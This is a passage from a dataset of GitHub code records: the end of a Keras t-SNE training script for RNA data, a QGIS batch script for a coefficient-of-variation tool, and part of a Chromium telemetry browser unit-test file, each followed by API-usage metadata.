plt.savefig(\"/.../RNA/vector1_train_pre.png\")\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred1 = model.predict(X_train)\r\n plt.scatter(pred1[:, 0], pred1[:, 1], marker='o', s=0.5, color=color2[0:22500])\r\n fig.tight_layout()\r\n plt.savefig(\"/.../RNA/vector2_train_pre.png\")\r\n model.save('/.../RNA/model_vector_pre.h5') \r\n if epoch==249:\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred3 = model.predict(X_train)\r\n plt.scatter(pred3[:, 0], pred3[:, 1], marker='o', s=0.5, color=color1[0:22500])\r\n fig.tight_layout()\r\n plt.savefig(\"/.../RNA/vector1_train_re1.png\")\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred3 = model.predict(X_train)\r\n plt.scatter(pred3[:, 0], pred3[:, 1], marker='o', s=0.5, color=color2[0:22500])\r\n fig.tight_layout()\r\n plt.savefig(\"/.../RNA/vector2_train_re1.png\")\r\n model.save('/.../RNA/model_vector_re1.h5')\r\n if epoch==349:\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred5 = model.predict(X_train)\r\n plt.scatter(pred5[:, 0], pred5[:, 1], marker='o', s=0.5, color=color1[0:22500])\r\n fig.tight_layout()\r\n plt.savefig(\"/storage/DRE_submission/RNA/vector1_train_re2.png\")\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred5 = model.predict(X_train)\r\n plt.scatter(pred5[:, 0], pred5[:, 1], marker='o', s=0.5, color=color2[0:22500])\r\n fig.tight_layout()\r\n plt.savefig(\"/.../RNA/vector2_train_re2.png\")\r\n model.save('/.../RNA/model_vector_re2.h5')\r\n \r\n if epoch==449:\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred7 = model.predict(X_train)\r\n plt.scatter(pred7[:, 0], pred7[:, 1], marker='o', s=0.5, color=color1[0:22500])\r\n fig.tight_layout()\r\n plt.savefig(\"/.../RNA/vector1_train_re3.png\")\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred7 = model.predict(X_train)\r\n plt.scatter(pred7[:, 0], pred7[:, 1], marker='o', s=0.5, color=color2[0:22500])\r\n fig.tight_layout()\r\n plt.savefig(\"/.../RNA/vector2_train_re3.png\")\r\n model.save('/.../RNA/model_vector_re3.h5')\r\n\r\npred = model.predict(X_train)\r\n\r\nplt.clf()\r\nfig = plt.figure(figsize=(5, 5)) \r\nplt.scatter(pred[:, 0], pred[:, 1], marker='o', s=0.5, color=color1[0:22500])\r\nfig.tight_layout()\r\nplt.savefig(\"/.../RNA/vector1_train_f.png\")\r\nplt.clf()\r\nfig = plt.figure(figsize=(5, 5)) \r\nplt.scatter(pred[:, 0], pred[:, 1], marker='o', s=0.5, color=color2[0:22500])\r\nfig.tight_layout()\r\nplt.savefig(\"/.../RNA/vector2_train_f.png\")\r\n##save model\r\nmodel.save(\"/.../RNA/model_vector.h5\") \r\n\r\n", "repo_name": "Eva0720/Deep-recursive-tSNE", "sub_path": "main_RNA.py", "file_name": "main_RNA.py", "file_ext": "py", "file_size_in_byte": 12424, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.random.seed", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 16, "usage_type": "attribute"}, {"api_name": "matplotlib.use", "line_number": 19, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.seterr", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 71, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 89, "usage_type": "attribute"}, {"api_name": "numpy.log", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 134, "usage_type": "call"}, {"api_name": "keras.backend.sum", "line_number": 141, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 141, "usage_type": "name"}, {"api_name": "keras.backend.square", "line_number": 141, "usage_type": "call"}, {"api_name": "keras.backend.variable", "line_number": 142, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 142, "usage_type": "name"}, {"api_name": "keras.backend.reshape", "line_number": 143, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 143, "usage_type": "name"}, {"api_name": "keras.backend.dot", "line_number": 143, "usage_type": "call"}, {"api_name": "keras.backend.transpose", "line_number": 143, "usage_type": "call"}, {"api_name": "keras.backend.pow", "line_number": 144, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 144, "usage_type": "name"}, {"api_name": "keras.backend.variable", "line_number": 145, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 145, "usage_type": "name"}, {"api_name": "numpy.eye", "line_number": 145, "usage_type": "call"}, {"api_name": "keras.backend.sum", "line_number": 146, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 146, "usage_type": "name"}, {"api_name": "keras.backend.maximum", "line_number": 147, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 147, "usage_type": "name"}, {"api_name": "keras.backend.sum", "line_number": 148, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 148, "usage_type": "name"}, {"api_name": "keras.backend.sum", "line_number": 149, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 149, "usage_type": "name"}, {"api_name": "keras.backend.log", "line_number": 149, "usage_type": "call"}, {"api_name": "keras.backend.sum", "line_number": 150, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 150, "usage_type": "name"}, {"api_name": "keras.backend.log", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 158, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise_distances", "line_number": 158, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 174, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 175, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 176, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 176, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 179, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 185, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 202, "usage_type": "call"}, {"api_name": "keras.backend.sum", "line_number": 207, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 207, "usage_type": "name"}, {"api_name": "keras.backend.square", "line_number": 207, "usage_type": "call"}, {"api_name": "keras.backend.variable", "line_number": 208, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 208, "usage_type": "name"}, {"api_name": "keras.backend.reshape", "line_number": 209, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 209, "usage_type": "name"}, {"api_name": "keras.backend.dot", "line_number": 209, "usage_type": "call"}, {"api_name": "keras.backend.transpose", "line_number": 209, "usage_type": "call"}, {"api_name": "keras.backend.pow", "line_number": 210, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 210, "usage_type": "name"}, {"api_name": "keras.backend.variable", "line_number": 211, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 211, "usage_type": "name"}, {"api_name": "numpy.eye", "line_number": 211, "usage_type": "call"}, {"api_name": "keras.backend.sum", "line_number": 212, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 212, "usage_type": "name"}, {"api_name": "keras.backend.maximum", "line_number": 213, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 213, "usage_type": "name"}, {"api_name": "keras.backend.log", "line_number": 214, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 214, "usage_type": "name"}, {"api_name": "keras.backend.sum", "line_number": 215, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 215, "usage_type": "name"}, {"api_name": "numpy.load", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 227, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 235, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 238, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 239, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 240, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 241, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 242, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 243, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 244, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 245, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 246, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 247, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 248, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 249, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 250, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 251, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 252, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 253, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 254, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 255, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "keras.models.Model", "line_number": 279, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 287, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 295, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 325, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 325, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 326, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 326, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 328, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 328, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 330, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 330, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 331, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 331, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 332, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 332, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 334, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 334, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 336, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 336, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 339, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 339, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 340, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 342, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 342, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 344, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 344, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 345, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 345, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 346, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 346, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 348, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 348, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 350, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 350, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 353, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 353, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 354, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 354, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 356, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 356, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 358, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 358, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 359, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 359, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 360, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 360, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 362, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 362, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 364, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 364, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 368, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 368, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 369, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 369, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 371, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 371, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 373, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 373, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 374, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 374, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 375, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 375, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 377, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 377, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 379, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 379, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 384, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 384, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 386, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 386, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 388, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 389, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 389, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 390, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 390, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 391, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 391, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 393, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 393, "usage_type": "name"}]} +{"seq_id": "71191430246", "text": "\"\"\"GeoCogs QGIS plugin - Coefficient of Variation tool\nThis script will help run the tool as batch process for\ndifferent shape files and no. of years.\n\"\"\"\nfrom qgis import processing\nimport os\nfrom pathlib import Path\nimport time\n\n# folder path to multiple input shape files\nshp_directory = r'C:\\Users\\atree\\Desktop\\shp'\n\n# folder path to save the output CSV files\nout_directory = r'C:\\Users\\atree\\Desktop\\CSV'\n\n# input parameters - list of (start_year, end_year)\nyears = [\n (2019, 2019),\n (2020, 2020),\n (2021, 2021),\n]\nparameters = {\n 'START MONTH': 6,\n 'END MONTH': 9,\n 'PARAMETER': 0,\n 'COLNAME': 'DISTRICT' # unique field name\n}\n\n# don't modify beyond this line\nprint('started...')\nfor year in years:\n start_year, end_year = year\n out_path = Path.joinpath(Path(out_directory), f\"{str(start_year)}_{str(end_year)}\")\n out_path.mkdir(parents=True, exist_ok=True)\n for file in os.listdir(shp_directory):\n if os.path.splitext(file)[1] == '.shp':\n input_shp = os.path.join(shp_directory, file)\n # print(f'input file: {input_shp}')\n output_csv = os.path.join(\n out_path, f'{os.path.splitext(file)[0]}.csv')\n parameters['INPUT'] = input_shp\n parameters['OUTPUT'] = output_csv\n parameters['START YEAR'] = start_year\n parameters['END YEAR'] = end_year\n processing.run(\"geocogs:coeff_var\", parameters)\n print(f'{year} : {output_csv}')\n # time.sleep(300)\n\nprint('completed!!!')", "repo_name": "balakumaran247/geocogs", "sub_path": "batch_scripts/coeffofvariationbatch.py", "file_name": "coeffofvariationbatch.py", "file_ext": "py", "file_size_in_byte": 1527, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path.joinpath", "line_number": 33, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 33, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "qgis.processing.run", "line_number": 45, "usage_type": "call"}, {"api_name": "qgis.processing", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "12508816105", "text": "import logging\nimport os\nimport re\nimport tempfile\nimport unittest\n\nfrom telemetry.core import exceptions\nfrom telemetry import decorators\nfrom telemetry.internal.browser import browser as browser_module\nfrom telemetry.internal.browser import browser_finder\nfrom telemetry.internal.platform import gpu_device\nfrom telemetry.internal.platform import gpu_info\nfrom telemetry.internal.platform import system_info\nfrom telemetry.testing import browser_test_case\nfrom telemetry.testing import options_for_unittests\nfrom telemetry.timeline import tracing_config\n\nfrom devil.android import app_ui\n\nimport mock\n\n\nclass IntentionalException(Exception):\n pass\n\n\nclass BrowserTest(browser_test_case.BrowserTestCase):\n def testBrowserCreation(self):\n self.assertEquals(1, len(self._browser.tabs))\n\n # Different browsers boot up to different things.\n assert self._browser.tabs[0].url\n\n @decorators.Enabled('has tabs')\n def testNewCloseTab(self):\n existing_tab = self._browser.tabs[0]\n self.assertEquals(1, len(self._browser.tabs))\n existing_tab_url = existing_tab.url\n\n new_tab = self._browser.tabs.New()\n self.assertEquals(2, len(self._browser.tabs))\n self.assertEquals(existing_tab.url, existing_tab_url)\n self.assertEquals(new_tab.url, 'about:blank')\n\n new_tab.Close()\n self.assertEquals(1, len(self._browser.tabs))\n self.assertEquals(existing_tab.url, existing_tab_url)\n\n def testMultipleTabCalls(self):\n self._browser.tabs[0].Navigate(self.UrlOfUnittestFile('blank.html'))\n self._browser.tabs[0].WaitForDocumentReadyStateToBeInteractiveOrBetter()\n\n def testTabCallByReference(self):\n tab = self._browser.tabs[0]\n tab.Navigate(self.UrlOfUnittestFile('blank.html'))\n self._browser.tabs[0].WaitForDocumentReadyStateToBeInteractiveOrBetter()\n\n @decorators.Enabled('has tabs')\n def testCloseReferencedTab(self):\n self._browser.tabs.New()\n tab = self._browser.tabs[0]\n tab.Navigate(self.UrlOfUnittestFile('blank.html'))\n tab.Close()\n self.assertEquals(1, len(self._browser.tabs))\n\n @decorators.Enabled('has tabs')\n def testForegroundTab(self):\n # Should be only one tab at this stage, so that must be the foreground tab\n original_tab = self._browser.tabs[0]\n self.assertEqual(self._browser.foreground_tab, original_tab)\n new_tab = self._browser.tabs.New()\n # New tab shouls be foreground tab\n self.assertEqual(self._browser.foreground_tab, new_tab)\n # Make sure that activating the background tab makes it the foreground tab\n original_tab.Activate()\n self.assertEqual(self._browser.foreground_tab, original_tab)\n # Closing the current foreground tab should switch the foreground tab to the\n # other tab\n original_tab.Close()\n self.assertEqual(self._browser.foreground_tab, new_tab)\n\n # This test uses the reference browser and doesn't have access to\n # helper binaries like crashpad_database_util.\n @decorators.Enabled('linux')\n def testGetMinidumpPathOnCrash(self):\n tab = self._browser.tabs[0]\n with self.assertRaises(exceptions.AppCrashException):\n tab.Navigate('chrome://crash', timeout=5)\n crash_minidump_path = self._browser.GetMostRecentMinidumpPath()\n self.assertIsNotNone(crash_minidump_path)\n\n def testGetSystemInfo(self):\n if not self._browser.supports_system_info:\n logging.warning(\n 'Browser does not support getting system info, skipping test.')\n return\n\n info = self._browser.GetSystemInfo()\n\n self.assertTrue(isinstance(info, system_info.SystemInfo))\n self.assertTrue(hasattr(info, 'model_name'))\n self.assertTrue(hasattr(info, 'gpu'))\n self.assertTrue(isinstance(info.gpu, gpu_info.GPUInfo))\n self.assertTrue(hasattr(info.gpu, 'devices'))\n self.assertTrue(len(info.gpu.devices) > 0)\n for g in info.gpu.devices:\n self.assertTrue(isinstance(g, gpu_device.GPUDevice))\n\n def testGetSystemInfoNotCachedObject(self):\n if not self._browser.supports_system_info:\n logging.warning(\n 'Browser does not support getting system info, skipping test.')\n return\n\n info_a = self._browser.GetSystemInfo()\n info_b = self._browser.GetSystemInfo()\n self.assertFalse(info_a is info_b)\n\n def testSystemInfoModelNameOnMac(self):\n if self._browser.platform.GetOSName() != 'mac':\n self.skipTest('This test is only run on macOS')\n return\n\n if not self._browser.supports_system_info:\n logging.warning(\n 'Browser does not support getting system info, skipping test.')\n return\n\n info = self._browser.GetSystemInfo()\n model_name_re = r\"[a-zA-Z]* [0-9.]*\"\n self.assertNotEqual(re.match(model_name_re, info.model_name), None)\n\n # crbug.com/628836 (CrOS, where system-guest indicates ChromeOS guest)\n # github.com/catapult-project/catapult/issues/3130 (Windows)\n @decorators.Disabled('cros-chrome-guest', 'system-guest', 'chromeos', 'win')\n def testIsTracingRunning(self):\n tracing_controller = self._browser.platform.tracing_controller\n if not tracing_controller.IsChromeTracingSupported():\n return\n self.assertFalse(tracing_controller.is_tracing_running)\n config = tracing_config.TracingConfig()\n config.enable_chrome_trace = True\n tracing_controller.StartTracing(config)\n self.assertTrue(tracing_controller.is_tracing_running)\n tracing_controller.StopTracing()\n self.assertFalse(tracing_controller.is_tracing_running)\n\n @decorators.Enabled('android')\n def testGetAppUi(self):\n self.assertTrue(self._browser.supports_app_ui_interactions)\n ui = self._browser.GetAppUi()\n self.assertTrue(isinstance(ui, app_ui.AppUi))\n self.assertIsNotNone(ui.WaitForUiNode(resource_id='action_bar_root'))\n\n\nclass CommandLineBrowserTest(browser_test_case.BrowserTestCase):\n @classmethod\n def CustomizeBrowserOptions(cls, options):\n options.AppendExtraBrowserArgs('--user-agent=telemetry')\n\n def testCommandLineOverriding(self):\n # This test starts the browser with --user-agent=telemetry. This tests\n # whether the user agent is then set.\n t = self._browser.tabs[0]\n t.Navigate(self.UrlOfUnittestFile('blank.html'))\n t.WaitForDocumentReadyStateToBeInteractiveOrBetter()\n self.assertEquals(t.EvaluateJavaScript('navigator.userAgent'),\n 'telemetry')\n\nclass DirtyProfileBrowserTest(browser_test_case.BrowserTestCase):\n @classmethod\n def CustomizeBrowserOptions(cls, options):\n options.profile_type = 'small_profile'\n\n @decorators.Disabled('chromeos') # crbug.com/243912\n def testDirtyProfileCreation(self):\n self.assertEquals(1, len(self._browser.tabs))\n\n\nclass BrowserLoggingTest(browser_test_case.BrowserTestCase):\n @classmethod\n def CustomizeBrowserOptions(cls, options):\n options.logging_verbosity = options.VERBOSE_LOGGING\n\n @decorators.Disabled('chromeos', 'android')\n def testLogFileExist(self):\n self.assertTrue(\n os.path.isfile(self._browser._browser_backend.log_file_path))\n\n\nclass BrowserCreationTest(unittest.TestCase):\n def setUp(self):\n self.mock_browser_backend = mock.MagicMock()\n self.mock_platform_backend = mock.MagicMock()\n self.fake_startup_args = ['--foo', '--bar=2']\n\n def testCleanedUpCalledWhenExceptionRaisedInBrowserCreation(self):\n self.mock_browser_backend.SetBrowser.side_effect = (\n IntentionalException('Boom!'))\n with self.assertRaises(IntentionalException):\n browser_module.Browser(\n self.mock_browser_backend, self.mock_platform_backend,\n self.fake_startup_args)\n self.assertTrue(self.mock_browser_backend.Close.called)\n\n def testOriginalExceptionNotSwallow(self):\n self.mock_browser_backend.SetBrowser.side_effect = (\n IntentionalException('Boom!'))\n self.mock_platform_backend.WillCloseBrowser.side_effect = (\n IntentionalException('Cannot close browser!'))\n with self.assertRaises(IntentionalException) as context:\n browser_module.Browser(\n self.mock_browser_backend, self.mock_platform_backend,\n self.fake_startup_args)\n self.assertIn('Boom!', context.exception.message)\n\n\nclass TestBrowserCreation(unittest.TestCase):\n\n def setUp(self):\n self.finder_options = options_for_unittests.GetCopy()\n self.browser_to_create = browser_finder.FindBrowser(self.finder_options)\n self.browser_to_create.platform.network_controller.Open()\n\n @property\n def browser_options(self):\n return self.finder_options.browser_options\n\n def tearDown(self):\n self.browser_to_create.platform.network_controller.Close()\n\n def testCreateWithBrowserSession(self):\n with self.browser_to_create.BrowserSession(self.browser_options) as browser:\n tab = browser.tabs.New()\n tab.Navigate('about:blank')\n self.assertEquals(2, tab.EvaluateJavaScript('1 + 1'))\n\n def testCreateWithBadOptionsRaises(self):\n with self.assertRaises(AssertionError):\n # It's an error to pass finder_options instead of browser_options.\n with self.browser_to_create.BrowserSession(self.finder_options):\n pass # Do nothing.\n\n @decorators.Enabled('linux')\n # TODO(crbug.com/782691): enable this on Win\n # TODO(ashleymarie): Re-enable on mac (BUG=catapult:#3523)\n @decorators.Isolated\n def testBrowserNotLeakingTempFiles(self):\n before_browser_run_temp_dir_content = os.listdir(tempfile.tempdir)\n with self.browser_to_create.BrowserSession(self.browser_options) as browser:\n tab = browser.tabs.New()\n tab.Navigate('about:blank')\n self.assertEquals(2, tab.EvaluateJavaScript('1 + 1'))\n after_browser_run_temp_dir_content = os.listdir(tempfile.tempdir)\n self.assertEqual(before_browser_run_temp_dir_content,\n after_browser_run_temp_dir_content)\n\n def testSuccessfullyStartBrowserWithSystemCacheClearOptions(self):\n browser_options = self.browser_options\n browser_options.clear_sytem_cache_for_browser_and_profile_on_start = True\n with self.browser_to_create.BrowserSession(browser_options) as browser:\n tab = browser.tabs.New()\n tab.Navigate('about:blank')\n self.assertEquals(2, tab.EvaluateJavaScript('1 + 1'))\n", "repo_name": "kiwibrowser/src", "sub_path": "third_party/catapult/telemetry/telemetry/internal/browser/browser_unittest.py", "file_name": "browser_unittest.py", "file_ext": "py", "file_size_in_byte": 10061, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "telemetry.testing.browser_test_case.BrowserTestCase", "line_number": 27, "usage_type": "attribute"}, {"api_name": "telemetry.testing.browser_test_case", "line_number": 27, "usage_type": "name"}, {"api_name": "telemetry.decorators.Enabled", "line_number": 34, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 34, "usage_type": "name"}, {"api_name": 